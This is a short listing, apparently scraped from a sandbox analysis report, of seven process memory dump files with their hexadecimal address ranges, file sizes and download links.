    • memory/4792-305-0x0000000007EB0000-0x0000000008200000-memory.dmp

      Filesize

      3.3MB

      Download

    • memory/4792-331-0x0000000009AA0000-0x0000000009B45000-memory.dmp

      Filesize

      660KB

      Download

    • memory/4792-325-0x0000000070140000-0x000000007018B000-memory.dmp

      Filesize

      300KB

      Download

    • memory/4832-1020-0x0000000000400000-0x0000000004420000-memory.dmp

      Filesize

      64.1MB

      Download

    • memory/5036-565-0x0000000070190000-0x00000000704E0000-memory.dmp

      Filesize

      3.3MB

      Download

    • memory/5036-544-0x0000000007B60000-0x0000000007EB0000-memory.dmp

      Filesize

      3.3MB

      Download

    • memory/5036-564-0x0000000070140000-0x000000007018B000-memory.dmp

      Filesize

      300KB

      Download